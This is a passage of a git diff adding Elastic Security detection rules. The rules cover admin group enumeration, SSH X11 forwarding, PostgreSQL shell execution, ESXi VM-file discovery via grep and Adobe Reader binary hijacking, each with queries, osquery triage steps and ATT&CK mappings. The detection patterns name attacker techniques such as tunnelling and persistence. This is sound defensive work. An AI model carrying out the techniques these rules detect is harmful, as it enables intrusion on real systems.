authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:windows and event.category:iam and event.action:user-member-enumerated and \n (\n group.name:(*Admin* or \"RemoteDesktopUsers\") or\n winlog.event_data.TargetSid:(\"S-1-5-32-544\" or \"S-1-5-32-555\")\n ) and \n not (\n winlog.event_data.SubjectUserName: *$ or\n winlog.event_data.SubjectUserSid: (\"S-1-5-19\" or \"S-1-5-20\") or \n winlog.event_data.CallerProcessName:(\"-\" or \n C\\:\\\\Windows\\\\System32\\\\VSSVC.exe or \n C\\:\\\\Windows\\\\System32\\\\SearchIndexer.exe or \n C\\:\\\\Windows\\\\System32\\\\CompatTelRunner.exe or \n C\\:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe or\n C\\:\\\\Windows\\\\System32\\\\net1.exe or \n C\\:\\\\Windows\\\\System32\\\\svchost.exe or \n C\\:\\\\Windows\\\\System32\\\\Netplwiz.exe or \n C\\:\\\\Windows\\\\System32\\\\msiexec.exe or\n C\\:\\\\Windows\\\\System32\\\\CloudExperienceHostBroker.exe or\n C\\:\\\\Windows\\\\System32\\\\RuntimeBroker.exe or\n C\\:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe or\n C\\:\\\\Windows\\\\System32\\\\SrTasks.exe or\n C\\:\\\\Windows\\\\System32\\\\diskshadow.exe or\n C\\:\\\\Windows\\\\System32\\\\dfsrs.exe or\n C\\:\\\\Windows\\\\System32\\\\vssadmin.exe or\n C\\:\\\\Windows\\\\System32\\\\dllhost.exe or\n C\\:\\\\Windows\\\\System32\\\\mmc.exe or\n C\\:\\\\Windows\\\\System32\\\\SettingSyncHost.exe or\n C\\:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe or\n C\\:\\\\Windows\\\\System32\\\\wsmprovhost.exe or\n C\\:\\\\Windows\\\\System32\\\\mstsc.exe or\n C\\:\\\\Windows\\\\System32\\\\esentutl.exe or\n C\\:\\\\Windows\\\\System32\\\\RecoveryDrive.exe or\n C\\:\\\\Windows\\\\System32\\\\SystemPropertiesComputerName.exe or\n C\\:\\\\Windows\\\\SysWOW64\\\\msiexec.exe or\n C\\:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe or\n C\\:\\\\Windows\\\\Temp\\\\rubrik_vmware*\\\\snaptool.exe or\n C\\:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe or\n C\\:\\\\WindowsAzure\\\\*WaAppAgent.exe or\n C\\:\\\\$WINDOWS.~BT\\\\Sources\\\\*.exe\n )\n )\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "group.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallerProcessName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserSid", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetSid", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "291a0de9-937a-4189-94c0-3e847c8b13e4", + "setup": "## Setup\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/", + "subtechnique": [ + { + "id": "T1069.001", + "name": "Local Groups", + "reference": "https://attack.mitre.org/techniques/T1069/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 311 + }, + "id": "291a0de9-937a-4189-94c0-3e847c8b13e4_311", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/29f0cf93-d17c-4b12-b4f3-a433800539fa_3.json b/packages/security_detection_engine/kibana/security_rule/29f0cf93-d17c-4b12-b4f3-a433800539fa_3.json new file mode 100644 index 00000000000..3852d8403ae --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/29f0cf93-d17c-4b12-b4f3-a433800539fa_3.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule monitors for X11 forwarding via SSH. X11 forwarding is a feature that allows users to run graphical applications on a remote server and display the application's graphical user interface on their local machine. Attackers can abuse X11 forwarding for tunneling their GUI-based tools, pivot through compromised systems, and create covert communication channels, enabling lateral movement and facilitating remote control of systems within a network.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux SSH X11 Forwarding", + "note": "## Triage and analysis\n\n### Investigating Potential Linux SSH X11 Forwarding\n\nAttackers can leverage SSH X11 forwarding to capture a user's graphical desktop session and potentially execute unauthorized GUI applications remotely.\n\nThis rule looks for the execution of SSH in conjunction with command line arguments that are capable of setting up X11 forwarding. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate network forwarding activity. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Potential Linux Tunneling and/or Port Forwarding - 6ee947e9-de7e-4281-a55d-09289bdf947e\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses port tunneling/forwarding for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\nprocess.name in (\"ssh\", \"sshd\") and process.args in (\"-X\", \"-Y\") and process.args_count >= 3 and \nprocess.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", + "references": [ + "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "29f0cf93-d17c-4b12-b4f3-a433800539fa", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "29f0cf93-d17c-4b12-b4f3-a433800539fa_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_6.json b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_6.json new file mode 100644 index 00000000000..2bc8ce6ac3e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2a692072-d78d-42f3-a48a-775677d79c4e_6.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for suspicious activities that may indicate an attacker attempting to execute arbitrary code within a PostgreSQL environment. Attackers can execute code via PostgreSQL as a result of gaining unauthorized access to a public facing PostgreSQL database or exploiting vulnerabilities, such as remote command execution and SQL injection attacks, which can result in unauthorized access and malicious actions, and facilitate post-exploitation activities for unauthorized access and malicious actions.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Code Execution via Postgresql", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"fork\", \"fork_event\") and \nuser.name == \"postgres\" and (\n (process.parent.args : \"*sh\" and process.parent.args : \"echo*\") or \n (process.args : \"*sh\" and process.args : \"echo*\")\n) and not process.parent.name : \"puppet\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2a692072-d78d-42f3-a48a-775677d79c4e", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "2a692072-d78d-42f3-a48a-775677d79c4e_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_6.json b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_6.json new file mode 100644 index 00000000000..412e5cf62f4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_6.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where a process named 'grep', 'egrep', or 'pgrep' is started on a Linux system with arguments related to virtual machine (VM) files, such as \"vmdk\", \"vmx\", \"vmxf\", \"vmsd\", \"vmsn\", \"vswp\", \"vmss\", \"nvram\", or \"vmem\". These file extensions are associated with VM-related file formats, and their presence in grep command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM files on the system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ESXI Discovery via Grep", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name in (\"grep\", \"egrep\", \"pgrep\") and process.args in (\n \"vmdk\", \"vmx\", \"vmxf\", \"vmsd\", \"vmsn\", \"vswp\", \"vmss\", \"nvram\", \"vmem\"\n)\n", + "references": [ + "https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2b662e21-dc6e-461e-b5cf-a6eb9b235ec4", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1518", + "name": "Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "2b662e21-dc6e-461e-b5cf-a6eb9b235ec4_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_110.json b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_110.json new file mode 100644 index 00000000000..50c8dc4064b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_110.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects writing executable files that will be automatically launched by Adobe on launch.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Adobe Hijack Persistence", + "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.path : (\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\") and\n not process.name : \"msiexec.exe\"\n", + "references": [ + "https://twitter.com/pabraeken/status/997997818362155008" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "2bf78aa2-9c56-48de-b139-f169bf99cf86", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.010", + "name": "Services File Permissions Weakness", + "reference": "https://attack.mitre.org/techniques/T1574/010/" + } + ] + }, + { + "id": "T1554", + "name": "Compromise Client Software Binary", + "reference": "https://attack.mitre.org/techniques/T1554/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "2bf78aa2-9c56-48de-b139-f169bf99cf86_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_111.json b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_111.json new file mode 100644 index 00000000000..2448baa8a41 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_111.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects writing executable files that will be automatically launched by Adobe on launch.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Adobe Hijack Persistence", + "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the 